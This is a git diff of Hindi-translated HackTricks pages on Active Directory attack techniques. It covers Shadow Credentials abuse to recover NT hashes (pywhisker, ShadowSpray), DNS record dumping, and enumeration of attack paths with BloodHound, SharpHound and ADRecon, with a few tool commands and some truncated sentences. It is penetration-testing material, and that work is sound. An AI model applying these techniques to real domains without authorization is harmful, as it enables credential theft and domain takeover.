* **अपने हैकिंग ट्रिक्स को [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके अपना योगदान दें।** * **हैकिंग ट्रिक्स साझा करें, [हैकट्रिक्स रेपो](https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके**
</details> </details>
@ -16,83 +16,6 @@
इस तकनीक के बारे में [**सभी जानकारी के लिए मूल पोस्ट की जांच करें**](https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab)। इस तकनीक के बारे में [**सभी जानकारी के लिए मूल पोस्ट की जांच करें**](https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab)।
संक्षेप में: यदि आप किसी उपयोगकर्ता/कंप्यूटर के **msDS-KeyCredentialLink** गुण के लिए लिख सकते हैं, तो आप उस ऑब्जेक्ट के **NT हैश** को प्राप्त कर सकते हैं। **सारांश**: यदि आप किसी उपयोगकर्ता/कंप्यूटर के **msDS-KeyCredentialLink** गुणक में लिख सकते हैं, तो आप **उस ऑब्जेक्ट का एनटी हैश प्राप्त** कर सकते हैं।
इसलिए आप ऑब्जेक्ट के लिए **सार्वजनिक-निजी कुंजी प्रमाणीकरण क्रेडेंशियल्स** सेट कर सकेंगे और उन्हें उपयोग करके एक **विशेष सेवा टिकट** प्राप्त कर सकेंगे जिसमें एनटीएलएम हैश एन्क्रिप्टेड NTLM\_SUPPLEMENTAL\_CREDENTIAL एंटिटी के भीतर निहित होता है जिसे आप डिक्रिप्ट कर सकते हैं। यह इसलिए है क्योंकि आप ऑब्ज
### आवश्यकताएं <a href="#2de4" id="2de4"></a>
इस तकनीक के लिए निम्नलिखित आवश्यकताएं होती हैं:
* कम से कम एक Windows Server 2016 डोमेन कंट्रोलर।
* डोमेन कंट्रोलर पर सर्वर प्रमाणीकरण के लिए एक डिजिटल प्रमाणपत्र।
* Active Directory में Windows Server 2016 कार्यान्वयन स्तर।
* लक्षित ऑब्जेक्ट के msDS-KeyCredentialLink गुण में लिखने के लिए धारित अधिकार वाले खाते को संक्रमित करें।
## दुरुपयोग
कंप्यूटर ऑब्जेक्ट के लिए Key Trust का दुरुपयोग करने के लिए, खाते के लिए एक TGT और NTLM हैश प्राप्त करने के बाद अतिरिक्त कदम चाहिए होते हैं। सामान्यतः दो विकल्प होते हैं:
1. एक **RC4 सिल्वर टिकट** जालसाजी करें ताकि उच्चाधिकृत उपयोगकर्ताओं को संबंधित होस्ट के लिए अनुकरण कर सकें।
2. TGT का उपयोग करके **S4U2Self** को कॉल करें ताकि उच्चाधिकृत उपयोगकर्ताओं को संबंधित होस्ट के लिए अनुकरण कर सकें। इस विकल्प के लिए, प्राप्त सेवा टिकट में सेवा नाम में एक सेवा वर्ग शामिल करने की आवश्यकता होती है।
Key Trust दुरुपयोग का अतिरिक्त लाभ है कि इसमें एक और खाता को पहुंच दी जाती है जिसे संक्रमित किया जा सकता है - यह **हमारे द्वारा उत्पन्न की गई आकस्मिक कुंजी सीमित होती है**। इसके अलावा, यह एक कंप्यूटर खाता बनाने की आवश्यकता नहीं है जिसे उच्चाध
## [pywhisker](https://github.com/ShutdownRepo/pywhisker) <a href="#7e2e" id="7e2e"></a>
pyWhisker एक Python संस्करण है जो Elad Shamir द्वारा बनाए गए मूल Whisker का समकक्ष है और C# में लिखा गया है। यह उपकरण उपयोगकर्ताओं को लक्ष्य उपयोगकर्ता / कंप्यूटर के msDS-KeyCredentialLink गुणांक को संशोधित करने की अनुमति देता है ताकि उन्हें उस वस्तु पर पूर्ण नियंत्रण मिल सके।
यह Impacket पर आधारित है और podalirius द्वारा बनाए गए Michael Grafnetter के DSInternals का Python संकक्ष है। यह उपकरण, Dirk-jan के PKINITtools के साथ केवल UNIX आधारित सिस्टमों पर पूर्ण प्राथमिक उत्पीड़न की अनुमति देता है।
pyWhisker का उपयोग निम्नलिखित क्रियाओं को msDs-KeyCredentialLink गुणांक पर करने के लिए किया जा सकता है
- *सूची*: सभी मौजूदा KeyCredentials ID और निर्माण समय की सूची बनाएँ
- *जानकारी*: KeyCredential संरचना में सभी जानकारी प्रिंट करें
- *जोड़ें*: msDs-KeyCredentialLink में एक नया KeyCredential जोड़ें
- *हटाएं*: msDs-KeyCredentialLink से एक KeyCredential हटाएं
- *साफ़ करें*: msDs-KeyCredentialLink से सभी KeyCredentials हटाएं
- *निर्यात*: JSON में msDs-KeyCredentialLink से सभी KeyCredentials निर्यात करें
- *आयात*: JSON फ़ाइल से KeyCredentials के साथ msDs-KeyCredentialLink को अधिलेखित करें
pyWhisker निम्नलिखित प्रमाणीकरण का समर्थन करता है:
- (NTLM) साफ पाठशब्द
- (NTLM) पास-द-हैश
- (Kerberos) साफ पाठशब्द
- (Kerberos) पास-द-कुंजी / ओवरपास-द-हैश
- (Kerberos) पास-द-कैश (पास-द-टिकट के प्रकार)
![](https://github.com/ShutdownRepo/pywhisker/blob/main/.assets/add_pfx.png)
{% hint style="info" %}
[**Readme**](https://github.com/ShutdownRepo/pywhisker) पर अधिक विकल्प।
{% endhint %}
## [ShadowSpray](https://github.com/Dec0ne/ShadowSpray/)
कई मामलों में, समूह "Everyone" / "Authenticated Users" / "Domain Users" या कोई अन्य **व्यापक समूह** डोमेन में सभी उपयोगकर्ताओं को सम्प्रदाय में कुछ `GenericWrite`/`GenericAll` DACLs **अन्य वस्तुओं** पर होते हैं। [**ShadowSpray**](https://github.com/Dec0ne/ShadowSpray/) इसलिए उन सभी पर **ShadowCredentials** का दुरुपयोग करने का प्रयास करता है
यह कुछ इस तरह से होता है:
1. प्रदान की गई प्रमाणिकता के साथ डोमेन में **लॉगिन** करें (या मौजूदा सत्र का उपयोग करें)।
2. यह जांचें कि **डोमेन कार्यात्मक स्तर 2016 है** (अन्यथा रुकें क्योंकि Shadow Credentials हमला काम नहीं करेगा)
3. LDAP से डोमेन में सभी वस्तुओं की **सूची इकट्ठा करें** (उपयोगकर्ता और कंप्यूटर)
4. सूची में **प्रत्येक वस्तु** के लिए निम्नलिखित करें:
1. वस्तु के `msDS-KeyCredentialLink` गुणांक में **KeyCredential जोड़ने** का प्रयास करें।
2. यदि उपरोक्त **सफल है**, तो जोड़े गए KeyCredential का उपयोग करके **PKINIT** का अनुरोध करें और जोड़ा गया KeyCredential का उपयोग करके **TGT** अनुरोध करें।
3. यदि उपरोक्त **सफल है**, तो **UnPACTheHash** हमला करें और उपयोगकर्ता / कंप्यूटर **NT हैश** उजागर करें।
4. यदि **`--RestoreShadowCred`** निर्दिष्ट किया गया है: जोड़े गए KeyCredential को हटाएं (अपने आप को साफ करें...)
5. यदि **`--Recursive`** निर्दिष्ट किया गया है: हमारे पास सफलतापूर्वक स्वामित्व में होने वाले प्रत्येक उपयोगकर्ता / कंप्यूटर खाते का उपयोग करके **एक ही प्रक्रिया** करें।
## संदर्भ
* [https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab](https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab)
* [https://github.com/eladshamir/Whisker](https://github.com/eladshamir/Whisker)
* [https://github.com/Dec0ne/ShadowSpray/](https://github.com/Dec0ne/ShadowSpray/)
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप एक **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड** करने की अनुमति चाहिए? [**सदस्यता योज

View file

@ -1,20 +1,20 @@
# AD DNS रिकॉर्ड्स # AD DNS रिकॉर्ड
<details> <details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की इच्छा है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFT**](https://opensea.io/collection/the-peass-family) संग्रह * [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटीज़**](https://opensea.io/collection/the-peass-family) संग्रह
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें * [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में **शामिल हों** या मुझे **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)** का पालन करें**. * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **अपने हैकिंग ट्रिक्स को [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके साझा करें**. * **हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud)** को PR जमा करके।
</details> </details>
डिफ़ॉल्ट रूप से **Active Directory में किसी भी उपयोगकर्ता** को डोमेन या फ़ॉरेस्ट DNS ज़ोन में सभी DNS रिकॉर्ड्स की **सूचीकरण** की अनुमति होती है, जो एक ज़ोन ट्रांसफ़र के समान होती है (उपयोगकर्ता AD पर्यावरण में एक DNS ज़ोन के बच्चा ऑब्जेक्ट की सूची बना सकते हैं). डिफ़ॉल्ट रूप से **किसी भी उपयोगकर्ता** को एक्टिव डायरेक्टरी में **सभी DNS रिकॉर्ड** को **सूचीबद्ध करने** की अनुमति होती है, जैसे कि ज़ोन ट्रांसफ़र (उपयोगकर्ता एडी परिवेश में एक DNS ज़ोन के बच्चे ऑब्जेक्ट्स को सूचीबद्ध कर सकते हैं)।
टूल [**adidnsdump**](https://github.com/dirkjanm/adidnsdump) इंटरनल नेटवर्क के पुनर्निर्धारण के लिए ज़ोन में सभी DNS रिकॉर्ड्स की **सूचीकरण** और **निर्यात** को संभव बनाता है। उपकरण [**adidnsdump**](https://github.com/dirkjanm/adidnsdump) **सभी DNS रिकॉर्ड** की **सूचीकरण** और **निर्यात** को सक्षम करता है जो आंतरिक नेटवर्क के जासूसी के उद्देश्यों के लिए है।
```bash ```bash
git clone https://github.com/dirkjanm/adidnsdump git clone https://github.com/dirkjanm/adidnsdump
cd adidnsdump cd adidnsdump
@ -29,10 +29,10 @@ cat records.csv
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की इच्छा है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापित करना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण देखना चाहते हैं या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जाँच करें!
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष संग्रह [**NFTs**](https://opensea.io/collection/the-peass-family) * [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह देखें
* प्राप्त करें [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) * [**आधिकारिक PEASS और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **फॉलो** करें मुझे **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर पर** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** का पालन करें**.
* **अपने हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud)** को PR जमा करके * **हैकिंग ट्रिक्स साझा करें, [हैकट्रिक्स रेपो](https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके**
</details> </details>

View file

@ -1,14 +1,14 @@
# BloodHound और अन्य AD Enum टूल्स # BloodHound और अन्य AD Enum टूल
<details> <details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबरसिक्योरिटी कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे**? या क्या आप PEASS के **नवीनतम संस्करण तक पहुँचना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा एक्सक्लूसिव [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह। * [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें। * [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें।
* **[**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) में शामिल हों या [**telegram समूह**](https://t.me/peass) में या मुझे **Twitter** पर **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) और **मुझे** **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **अपनी हैकिंग ट्रिक्स साझा करें, [hacktricks repo](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके।** * **हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud)** को PRs सबमिट करके।
</details> </details>
@ -16,85 +16,72 @@
[AD Explorer](https://docs.microsoft.com/en-us/sysinternals/downloads/adexplorer) Sysinternal Suite से है: [AD Explorer](https://docs.microsoft.com/en-us/sysinternals/downloads/adexplorer) Sysinternal Suite से है:
> एक उन्नत Active Directory (AD) व्यूअर और एडिटर। आप AD Explorer का उपयोग AD डेटाबेस को आसानी से नेविगेट करने, पसंदीदा स्थानों को परिभाषित करने, डायलॉग बॉक्स खोले बिना ऑब्जेक्ट प्रॉपर्टीज और एट्रिब्यूट्स देखने, परमिशन्स एडिट करने, ऑब्जेक्ट की स्कीमा देखने और सोफिस्टिकेटेड सर्चेस को एक्जीक्यूट करने के लिए कर सकते हैं जिन्हें आप सेव कर सकते हैं और फिर से एक्जीक्यूट कर सकते हैं। > एक उन्नत Active Directory (AD) दर्शक और संपादक। आप AD Explorer का उपयोग करके एक AD डेटाबेस में आसानी से नेविगेट कर सकते हैं, पसंदीदा स्थानों को परिभाषित कर सकते हैं, ऑब्ज
### स्नैपशॉट्स
AD Explorer AD के स्नैपशॉट्स बना सकता है ताकि आप इसे ऑफलाइन चेक कर सकें।\
इसका उपयोग ऑफलाइन वल्न्स की खोज करने या समय के साथ AD DB की विभिन्न स्थितियों की तुलना करने के लिए किया जा सकता है।
आपको AD से कनेक्ट करने के लिए यूजरनेम, पासवर्ड, और दिशा की आवश्यकता होगी।
AD का स्नैपशॉट लेने के लिए, `File` --> `Create Snapshot` पर जाएं और स्नैपशॉट के लिए एक नाम दर्ज करें।
## ADRecon
****[**ADRecon**](https://github.com/adrecon/ADRecon) एक ऐसा टूल है जो एक AD वातावरण से विभिन्न आर्टिफैक्ट्स निकालता है और संयोजित करता है। इस जानकारी को एक **विशेष रूप से फॉर्मेटेड** Microsoft Excel **रिपोर्ट** में प्रस्तुत किया जा सकता है जिसमें सारांश दृश्य और मेट्रिक्स शामिल होते हैं जो विश्लेषण को सुविधाजनक बनाते हैं और लक्षित AD वातावरण की वर्तमान स्थिति की एक समग्र तस्वीर प्रदान करते हैं।
```bash ```bash
# Run it # Run it
.\ADRecon.ps1 .\ADRecon.ps1
``` ```
## BloodHound ## BloodHound
> BloodHound एक एकल वेब एप्लिकेशन है जिसमें एक एम्बेडेड React फ्रंटएंड [Sigma.js](https://www.sigmajs.org/) के साथ और एक [Go](https://go.dev/) आधारित REST API बैकएंड है। इसे [Postgresql](https://www.postgresql.org/) एप्लिकेशन डेटाबेस और [Neo4j](https://neo4j.com) ग्राफ डेटाबेस के साथ तैनात किया जाता है, और इसे [SharpHound](https://github.com/BloodHoundAD/SharpHound) और [AzureHound](https://github.com/BloodHoundAD/AzureHound) डेटा कलेक्टर्स द्वारा फीड किया जाता है। > BloodHound एक मोनोलिथिक वेब एप्लिकेशन है जिसमें एक एम्बेडेड React फ्रंटएंड और [Sigma.js](https://www.sigmajs.org/) के साथ एक [Go](https://go.dev/) आधारित REST API बैकएंड है। इसे एक [Postgresql](https://www.postgresql.org/) एप्लिकेशन डेटाबेस और एक [Neo4j](https://neo4j.com) ग्राफ डेटाबेस के साथ डिप्लॉय किया गया है, और इसे [SharpHound](https://github.com/BloodHoundAD/SharpHound) और [AzureHound](https://github.com/BloodHoundAD/AzureHound) डेटा कलेक्टर्स द्वारा भोजित किया जाता है।
> >
>BloodHound ग्राफ सिद्धांत का उपयोग करके एक Active Directory या Azure वातावरण के भीतर छिपे हुए और अक्सर अनजाने में बने संबंधों को प्रकट करता है। हमलावर BloodHound का उपयोग करके आसानी से उन जटिल हमले के मार्गों की पहचान कर सकते हैं जिन्हें अन्यथा जल्दी से पहचानना असंभव होता। डिफेंडर्स BloodHound का उपयोग करके उन्ह हमले के मार्गों की पहचान और उन्हें समाप्त कर सकते हैं। नीली और लाल टीमें दोनों BloodHound का उपयोग करके एक Active Directory या Azure वातावरण में विशेषाधिकार संबंधों की गहरी समझ प्राप्त कर सकते हैं। >BloodHound ग्राफ सिद्धांत का उपयोग करता है ताकि एक्टिव डायरेक्टरी या एज़्यूर माहौल में छिपी हुई और अक्सर अनजान रिश्तों को प्रकट कर सके। हमलावर BloodHound का उपयोग करके आसानी से उन उच्च जटिल हमले के मार्गों की पहचान कर सकते हैं जो अन्यथा तेजी से पहचानना असंभव होगा। रक्षक BloodHound का उपयोग करके उनी हमले के मार्गों की पहचान और समाप्ति कर सकते हैं। नीला और लाल दल दोनों BloodHound का उपयोग करके एक्टिव डायरेक्टरी या एज़्यूर माहौल में विशेषाधिकार संबंधों की गहरी समझ प्राप्त करने के लिए आसानी से कर सकते हैं।
> >
>BloodHound CE को [BloodHound Enterprise Team](https://bloodhoundenterprise.io) द्वारा बनाया गया है और रखरखाव किया जाता है। मूल BloodHound को [@\_wald0](https://www.twitter.com/\_wald0), [@CptJesus](https://twitter.com/CptJesus), और [@harmj0y](https://twitter.com/harmj0y) द्वारा बनाया गया था। >BloodHound CE को [BloodHound Enterprise Team](https://bloodhoundenterprise.io) ने बनाया और बनाए रखा है। मूल BloodHound को [@\_wald0](https://www.twitter.com/\_wald0), [@CptJesus](https://twitter.com/CptJesus), और [@harmj0y](https://twitter.com/harmj0y) ने बनाया था।
> >
>[https://github.com/SpecterOps/BloodHound](https://github.com/SpecterOps/BloodHound) से >स्रोत: [https://github.com/SpecterOps/BloodHound](https://github.com/SpecterOps/BloodHound)
तो, [Bloodhound](https://github.com/SpecterOps/BloodHound) एक अद्भुत उपकरण है जो स्वचालित रूप से एक डोमेन को सूचीबद्ध कर सकता है, सभी जानकारी को सहेज सकता है, संभावित विशेषाधिकार वृद्धि मार्गों का पता लगा सकता है और सभी जानकारी को ग्राफ़ का उपयोग करके दिखा सकता है। इसलिए, [Bloodhound](https://github.com/SpecterOps/BloodHound) एक अद्वितीय उपकरण है जो एक डोमेन को स्वचालित रूप से गणना कर सकता है, सभी जानकारी को सहेज सकता है, संभावित विशेषाधिकार उन्नयन मार्गों को खोज सकता है और ग्राफ का उपयोग करके सभी जानकारी को दिखा सकता है।
Booldhound में मुख्य रूप से दो भाग होते हैं: **ingestors** और **विज़ुअलाइज़ेशन एप्लिकेशन**। Bloodhound 2 मुख्य भागों से मिलकर बना है: **इनजेस्टर्स** और **विजुअलाइजेशन एप्लिकेशन**।
**ingestors** का उपयोग **डोमेन को सूचीबद्ध करने और सभी जानकारी को निकालने** के लिए किया जाता है जिसे विज़ुअलाइज़ेशन एप्लिकेशन समझ सकता है **इनजेस्टर्स** का उपयोग **डोमेन को गणना करने और सभी जानकारी निकालने** के लिए किया जाता है जिसे विजुअलाइजेशन एप्लिकेशन समझेगा
**विजुअलाइजेशन एप्लिकेशन neo4j का उपयोग करता है** यह दिखाने के लिए कि सभी जानकारी कैसे संबंधित है और डोमेन में विशेषाधिकार वृद्धि के विभिन्न तरीके कैसे दिखाए जा सकते हैं **विजुअलाइजेशन एप्लिकेशन neo4j का उपयोग करता है** ताकि दिखाए कैसे सभी जानकारी संबंधित है और डोमेन में विशेषाधिकारों को बढ़ाने के विभिन्न तरीके दिखाए
### स्थापना ### स्थापना
BloodHound CE के निर्माण के बाद, पूर परियोजना को Docker के साथ उपयोग में आसानी के लिए अपडेट किया गया था। शुरू करने का सबसे आसान तरीका इसके पूर्व-निर्धारित Docker Compose कॉन्फ़िगरेशन का उपयोग करना है। BloodHound CE के निर्माण के बाद, पूर परियोजना को Docker के साथ उपयोग सुविधा के लिए अपडेट किया गया था। शुरू करने का सबसे आसान तरीका इसका पूर्व-कॉन्फ़िगर किया गया Docker Compose विन्यास का उपयोग करना है।
1. Docker Compose स्थापित करें। यह [Docker Desktop](https://www.docker.com/products/docker-desktop/) स्थापना के साथ शामिल होना चाहिए। 1. Docker Compose स्थापित करें। यह [Docker Desktop](https://www.docker.com/products/docker-desktop/) स्थापना के साथ शामिल होना चाहिए।
2. चलाएँ: 2. चलाएँ:
``` ```
curl -L https://ghst.ly/getbhce | docker compose -f - up curl -L https://ghst.ly/getbhce | docker compose -f - up
``` ```
3. टर्मिनल आउटपुट में Docker Compose के यादृच्छिक रूप से उत्पन्न पासवर्ड को खोजें। 3. डॉकर कंपोज़ के टर्मिनल आउटपुट में यादृच्छिक रूप से उत्पन्न पासवर्ड का पता लगाएं।
4. एक ब्राउज़र में, http://localhost:8080/ui/login पर नेविगेट करें। admin नाम के साथ लॉगिन करें और लॉग्स से प्राप्त यादृच्छिक रूप से उत्पन्न पासवर्ड का उपयोग करें। 4. ब्राउज़र में, http://localhost:8080/ui/login पर जाएं। एडमिन उपयोगकर्ता नाम और लॉग्स से यादृच्छिक रूप से उत्पन्न पासवर्ड के साथ लॉगिन करें।
इसके बाद आपको यादृच्छिक रूप से उत्पन्न पासवर्ड बदलने की आवश्यकता होगी और आपके पास नया इंटरफ़ेस तैयार होगा, जिससे आप सीधे इन्जेस्टर्स डाउनलोड कर सकते हैं। इसके बाद आपको यादृच्छिक रूप से उत्पन्न पासवर्ड बदलने की आवश्यकता होगी और आपके पास नया इंटरफेस तैयार हो जाएगा, जिससे आप सीधे इंजेस्टर्स को डाउनलोड कर सकते हैं।
### SharpHound ### SharpHound
उनके पास कई विकल्प हैं लेकिन यदि आप डोमेन से जुड़े पीसी से SharpHound चलाना चाहते हैं, अपने वर्तमान उपयोगकर्ता का उपयोग करके और सभी जानकारी निकालना चाहते हैं तो आप कर सकते हैं: उनके पास कई विकल्प हैं, लेकिन यदि आप डोमेन से जुड़े एक पीसी से SharpHound चलाना चाहते हैं, अपने वर्तमान उपयोगकर्ता का उपयोग करके सभी जानकारी निकालने के लिए आप कर सकते हैं:
``` ```
./SharpHound.exe --CollectionMethods All ./SharpHound.exe --CollectionMethods All
Invoke-BloodHound -CollectionMethod All Invoke-BloodHound -CollectionMethod All
``` ```
> **CollectionMethod** और लूप सेशन के बारे में आप यहाँ और पढ़ सकते हैं [यहाँ](https://support.bloodhoundenterprise.io/hc/en-us/articles/17481375424795-All-SharpHound-Community-Edition-Flags-Explained) > आप **CollectionMethod** और लूप सत्र के बारे में अधिक पढ़ सकते हैं [यहाँ](https://support.bloodhoundenterprise.io/hc/en-us/articles/17481375424795-All-SharpHound-Community-Edition-Flags-Explained)
